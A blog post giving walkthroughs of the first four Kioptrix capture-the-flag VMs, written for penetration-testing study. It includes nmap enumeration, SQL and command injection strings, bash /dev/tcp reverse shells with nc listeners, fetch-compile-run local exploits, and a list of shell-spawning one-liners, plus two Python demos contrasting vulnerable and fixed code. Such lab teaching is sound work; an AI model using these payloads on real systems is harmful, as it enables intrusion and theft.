I have decided to start studying towards a CISSP and / or an OSCP. As part of that I saw an excellent blog post recommending to go through a lot of CTF challenges from vulnhub.com. These are my Kioptrix walkthrough guides / findings and observations for each of the first 4 available Kioptrix images.
Kioptrix Walkthrough Level 1
For the first installation, I was following the walkthrough guides available on the net. Most guides say the first step is to map the network.
netdiscover
# or
nmap -sn 192.168.x.x/24
You can see my versions for mapping networks here: https://jonathansblog.co.uk/linux-commands-for-networking#advanced-linux-network-commands
Sample netdiscover output:
Currently scanning: 192.168.x.x/16 | Screen View: Unique Hosts
40 Captured ARP Req/Rep packets, from 14 hosts. Total size: 2400
IP At MAC Address Count Len MAC Vendor / Hostname
192.168.x.x 60:c5:47:0d:11:52 22 1320 Apple, Inc.
192.168.x.x 00:0c:29:ba:32:66 1 60 VMware, Inc.
Next, scan the host and get version info for services
nmap -sV 192.168.x.x
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http syn-ack Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind syn-ack 2 (RPC #100000)
139/tcp open netbios-ssn syn-ack Samba smbd (workgroup: 7MYGROUP)
443/tcp open ssl/http syn-ack Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
1024/tcp open status syn-ack 1 (RPC #100024)
Next thing is searchsploit (run everything through it)
searchsploit
Then, choose between the results (also, a general google search is great here, as is a search on exploit-db)
Kioptrix walkthrough – SSHD
** try to log in with blank creds
** try to log in with default creds (eg root/toor)
SMB
enumeration
https://www.hackingarticles.in/a-little-guide-to-smb-enumeration/
enum4linux
nmap --script smb-vuln* -p 139,445 192.168.x.x
HTTPD
** manually browse http server
** manually wget the robots.txt
** try to log in with blank creds
** try to log in with default creds (eg root/toor)
nikto -h 192.168.x.x
dirbuster
There will be programs to run for other services too
First thing to note is that everything on this host is ancient
You can see that the versions of Apache and OpenSSL are very old
A quick google for apache 1.3.20 vulnerability (excluding all the walkthrough guides) shows OpenFuck.c
From exploitdb we can also see the original exploit:
https://www.exploit-db.com/exploits/764
From searchsploit, we can see that we have the source already in kali
searchsploit openfuck
There is a link at the top of the exploit, which takes us here:
http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/
Following the instructions still can't compile the exploit (it's 13 years old at this point). A quick google for ‘openfuck kali compile’ gives us this:
https://github.com/heltonWernik/OpenLuck which compiles nicely :D Running is just a matter of:
./OpenFuck target box [port]
Target is a list of hex codes for specific platform / apache version combinations (eg redhat / apache-1.3.20 is 0x6a and 0x6b) [try them both…]
Kioptrix walkthrough – Listeners
On kali machine:
nc -nlvp 8080
Once you have a shell, on target machine, execute:
bash -i >& /dev/tcp/192.168.x.x/8080 0>&1
Boom.
Kioptrix walkthrough Level 2
Start with mapping the network:
netdiscover
# or
nmap -sn 192.168.x.x/24
Then an nmap of the host
root@kali:~# nmap -sV 192.168.x.x
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-03 20:25 UTC
Nmap scan report for 192.168.x.x
Host is up (0.016s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
80/tcp open http Apache httpd 2.0.52 ((CentOS))
111/tcp open rpcbind 2 (RPC #100000)
443/tcp open ssl/https?
631/tcp open ipp CUPS 1.1
800/tcp open status 1 (RPC #100024)
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 70:56:81:BE:16:0B (Apple)
Kioptrix walkthrough – SSHD
** try to log in with blank creds
** try to log in with default creds (eg root/toor)
HTTPD
** manually browse http server
** manually wget the robots.txt
Spider the website
nikto -h 192.168.x.x
dirbuster
SQLi (very basic, but try all input boxes with the following)
' or '1' = '1
Command injection
; cat /etc/passwd
Listener
On kali machine:
nc -nlvp 8080
On target (in the input field), paste
;bash -i >& /dev/tcp/192.168.x.x/8080 0>&1
Boom, you have a shell.
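An added illustration, not code from the post or from the Kioptrix VM: a Python stand-in for a form handler that hands the input box to a shell, showing why a `;` in the value runs a second command (the `; cat /etc/passwd` above works the same way), beside a version that validates the value and never invokes a shell. The handler, the `echo pinging` stand-in for the real command and the `echo INJECTED` marker are constructed for this demo.

```python
import ipaddress
import subprocess


def handle_vulnerable(target: str) -> str:
    # Mirrors a form handler that splices the input box into one shell
    # string. shell=True hands the whole string to /bin/sh, so ';' ends
    # the intended command and starts whatever follows it.
    # ("echo pinging" stands in for the real command in this demo.)
    result = subprocess.run(f"echo pinging {target}", shell=True,
                            capture_output=True, text=True)
    return result.stdout


def handle_safe(target: str) -> str:
    # 1) Validate the value against what the form actually expects
    #    (an IP address); anything containing ';' or spaces is rejected.
    addr = ipaddress.ip_address(target)       # ValueError on "x; ..."
    # 2) Pass it as its own argv element with shell=False: no shell
    #    parses the value, so metacharacters carry no meaning.
    result = subprocess.run(["echo", "pinging", str(addr)],
                            capture_output=True, text=True)
    return result.stdout


def handle_safe_or_reject(target: str) -> str:
    # What a form handler would return for rejected input, instead of
    # raising into the web framework.
    try:
        return handle_safe(target)
    except ValueError:
        return "rejected: not an IP address\n"


if __name__ == "__main__":
    injected = "127.0.0.1; echo INJECTED"    # constructed, benign marker
    print(handle_vulnerable(injected), end="")       # second line: INJECTED
    print(handle_safe_or_reject(injected), end="")   # rejected
```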
Exploits
exploit-db.com/exploits/1397
exploit-db.com/exploits/9542
Compile with:
gcc -o 1397 1397.c
gcc -o 9542 9542.c
Spawn a quick HTTP server (on the Kali box)
python -m SimpleHTTPServer 8080
In Kioptrix, cd to /tmp (you can't write anywhere else) then
cd /tmp
wget http://192.168.x.x:8080/1397
wget http://192.168.x.x:8080/9542
You’ll see that this doesn’t work (because the VM is 32 bit); even gcc -m32 didn’t work for me. So, inside Kioptrix /tmp, wget the exploits, compile and run.
cd /tmp
wget http://exploitdb.com/download/1397.c
wget http://exploitdb.com/download/9542.c
gcc -o 1397 1397.c
gcc -o 9542 9542.c
chmod +x 1397
chmod +x 9542
./1397
./9542
Boom, you got root (and lots of things to tidy up).
Kioptrix Walkthrough Level 3
As usual, start by getting info on the machines in the network
netdiscover
nmap -sn 192.168.x.x/24
Once you have the IP address, an nmap is in order
nmap -sV 192.168.x.x
And we can see that there is a (very) old Apache / PHP running
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-08 19:10 UTC
Nmap scan report for 192.168.x.x
Host is up (0.011s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
MAC Address: 70:56:81:BE:16:0B (Apple)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
SSH
Exploits:
cvedetails.com/version/169731/Openbsd-Openssh-4.7p1.html
No code execution or priv escalations :(
HTTPD
** manually browse http server
** manually wget the robots.txt
Spider the website
nikto -h 192.168.x.x
dirbuster for httpd
Exploits:
https://httpd.apache.org/security/vulnerabilities_22.html
https://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-66/version_id-77221/hasexp-1/Apache-Http-Server-2.2.8.html
There is one with a CVE score of 7.8
PHP
Searching google for “PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch vulnerability” we find https://www.exploit-db.com/exploits/29290
An exploit that will give us code execution which should work on our machine, except it doesn't compile on kali :(
We could modify it (for a few hours), so we will keep this as a ‘maybe’
Browsing the app on http, we find that there is a login form, which we check for sqli
http://kioptrix3.com/index.php?system=Admin&page=loginSubmit
POST
username=1' or '1'='1
password=1' or '1'='1
It doesn’t work, but there are other forms, so we check those too
Crawling the site
Spider the website
(seofrog is fantastic for this)
- http://kioptrix3.com/gallery/vote.php?id=5&vote=4&from=%2Fgallery%2Fp.php%2F5%3F%3F
- http://kioptrix3.com/index.php?system=Blog&post=1281005380
- http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos
- http://kioptrix3.com/gallery/gallery.php?id=1&sort=filename#photos
We find that the ID parameter is injectable (skipfish shows us)
We run an sqlmap (very noisy, but we are n00bs at this stage, so we run it anyway)
sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --dbs
We then get lots of information:
sqlmap identified the following injection point(s) with a total of 111 HTTP(s) requests:
Parameter: id (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: id=(SELECT (CASE WHEN (2170=2170) THEN 1 ELSE (SELECT 4104 UNION SELECT 2961) END))
Type: error-based
Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)
Payload: id=1 OR ROW(5709,4486)>(SELECT COUNT(*),CONCAT(0x716a6b7671,(SELECT (ELT(5709=5709,1))),0x7178717171,FLOOR(RAND(0)*2))x FROM (SELECT 1973 UNION SELECT 7702 UNION SELECT 7453 UNION SELECT 7745)a GROUP BY x)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: id=1 OR SLEEP(5)
Type: UNION query
Title: MySQL UNION query (random number) - 6 columns
Payload: id=1 UNION ALL SELECT 1980,CONCAT(0x716a6b7671,0x545a47644e42704f6c746a754474645973424c7541625778574e657552446a6467496359744e425a,0x7178717171),1980,1980,1980,1980#
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 4.1
available databases [3]:
[*] gallery
[*] information_schema
[*] mysql
We can then run sqlmap -a on the id parameter and get a dump of all the databases.
There is a table in the gallery database that looks interesting: dev_accounts
dreg,0d3eccfb887aabd50f243b3f155c0f85
loneferret,5badcaf789d3d1d09794d8f021f40f0e
We run those through an online md5 database and get the following:
dreg: Mast3r
loneferret: starwars
The first thing we try is to log in to the machine (and any other services)
Going back to the admin area, we find that it is running LotusCMS; a quick google search shows this:
https://www.rapid7.com/db/modules/exploit/multi/http/lcms_php_exec
An RCE, just what we need :) There is also an exploit: exploit-db.com/exploits/15964. It's in Python, which is nice
./15964 -t http://192.168.x.x -d /
It doesn’t work on my kali box, so I add this to the ‘maybe’ pile
I try logging in with ssh and it works.
I do a quick ls and see a file called ‘checksecurity’ and another called ‘companypolicy’
Reading the company policy doc reveals that everyone has to use ‘sudo ht’ to make edits.
Running sudo ht allows me to edit the /etc/sudoers file and add /bin/sh
I can then sudo sh and get root.
Kioptrix Walkthrough Level 4
Starting with the network mapping:
netdiscover
Or an nmap -sn 192.168.x.x/24
Once you have the IP address, an nmap is in order
nmap -sS -A -n 192.168.x.x
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-17 15:14 UTC
Nmap scan report for 192.168.x.x
Host is up (0.00053s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_ 2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:BA:32:66 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| clock-skew: mean: 48m30s, deviation: 2h49m43s, median: -1h11m30s
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: , NetBIOS MAC: (unknown)
| smb-os-discovery:
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name:
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2019-04-17T10:03:19-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE
HOP RTT ADDRESS
1 0.53 ms 192.168.x.x
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Ubuntu
Running: Linux 2.6.X (Linux 2.6.9 - 2.6.33)
services:
ssh 4.7p1 Debian 8ubuntu1.2
http
Apache/2.2.8 (Ubuntu)
PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
Samba smbd 3.0.28a
SMB
** try to log in with blank creds
** try to log in with default creds (eg root/toor)
** manually browse http server
** manually wget the robots.txt
Enumeration:
https://www.hackingarticles.in/a-little-guide-to-smb-enumeration/
enum4linux 192.168.x.x
We get a list of users:
- loneferret
- john
- root
- robert
- nobody
nmap --script smb-vuln* -p 139,445 192.168.x.x
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-17 16:42 BST
Nmap scan report for 192.168.0.23
Host is up (0.00060s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
| smb-vuln-regsvc-dos:
|   VULNERABLE:
|   Service regsvc in Microsoft Windows systems vulnerable to denial of service
|     State: VULNERABLE
|       The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
|       pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
|       while working on smb-enum-sessions.
|
Nmap done: 1 IP address (1 host up) scanned in 5.61 seconds
We have a possible vulnerability
smbclient -L 192.168.x.x
HTTPD
- https://www.exploit-db.com/exploits/42745
- https://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-66/version_id-77221/Apache-Http-Server-2.2.8.html
Try a basic sqli:
user: '
pass: '
We see an error message (Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/checklogin.php on line 28)
user: john
pass: 1' or '1' = '1
We get a screen that shows the password for the user john
We can then log in to ssh :)
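As an added illustration (not code from the post or from the Kioptrix image): a SQLite stand-in for a login query like the one behind checklogin.php, showing why `1' or '1' = '1` as the password returns john's row, why a stray quote produces a database error like the mysql_num_rows() warning above, and how the parameterised form treats the same input as plain text. The members table and the password value are constructed sample data.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed sample table standing in for the one checklogin.php
    # queries; the stored password is made up for this demo (and storing
    # it in clear text is a second defect, not shown here).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE members (username TEXT, password TEXT)")
    db.execute("INSERT INTO members VALUES ('john', 'example-password')")
    return db


def login_vulnerable(db, user: str, pw: str):
    # Builds the WHERE clause by string concatenation, as the PHP login
    # forms in these VMs do. The input is parsed as SQL, so
    # pw = "1' or '1' = '1" turns the clause into
    #   username='john' AND password='1' or '1' = '1'
    # and because AND binds tighter than OR, every row matches.
    sql = (f"SELECT username, password FROM members "
           f"WHERE username='{user}' AND password='{pw}'")
    try:
        return db.execute(sql).fetchall()
    except sqlite3.Error:
        # An unbalanced quote breaks the statement. PHP's mysql_query()
        # returns false in that case, and mysql_num_rows(false) is what
        # produced the "not a valid MySQL result resource" warning.
        return None


def login_safe(db, user: str, pw: str):
    # Parameterised query: the values travel separately from the
    # statement text, so quotes and OR in the input are just characters
    # compared against the column. (sqlite3 uses ? placeholders; MySQL
    # drivers use %s, the principle is identical.)
    sql = ("SELECT username, password FROM members "
           "WHERE username=? AND password=?")
    return db.execute(sql, (user, pw)).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "1' or '1' = '1"
    print("vulnerable:", login_vulnerable(db, "john", payload))  # row leaks
    print("bad quote: ", login_vulnerable(db, "'", "x"))         # None
    print("safe:      ", login_safe(db, "john", payload))        # []
```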
ssh john@192.168.x.x
From this point, I had to use a guide, the process went:
- Dig about in the php source code, find the creds to the database (I had found these, but hadn’t done anything with them)
- Then you get the creds for the ‘root’ mysql user
- Then check which user mysql runs as (root)
- Then check for a mysql function that allows system calls
- Then issue a system call to add john to the admin group
- Then sudo su
- Then you have root..
Overall learning:
I took a lot from the various walkthroughs that I read (I tried to defeat the systems myself, but had to resort to various walkthrough guides at various points)
The obvious things that I learned are that not everything has to be a software bug / some exploits are purely configuration
Nmap
Stealthy nmap scans are better:
instead of nmap -sn, use
nmap -Pn --disable-arp-ping -sT --top-ports 20 --open
nmap -Pn --disable-arp-ping -sS -p- -T4 --defeat-rst-ratelimit
And also try
nmap -Pn --disable-arp-ping -p 22,80,111,139,443,1024 -sT -sV -A 10.200.1.3
nmap -Pn --disable-arp-ping -p 111,137,138,1026 -sU -sV -A 10.200.1.3
Spawning shells
There are tons of ways to spawn a shell:
bash -i >& /dev/tcp/192.168.x.x/8080 0>&1
python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/sh -i
perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
#(From within IRB)
exec "/bin/sh"
#(From within vi)
:!bash
#(From within vi)
:set shell=/bin/bash:shell
#(From within nmap)
!sh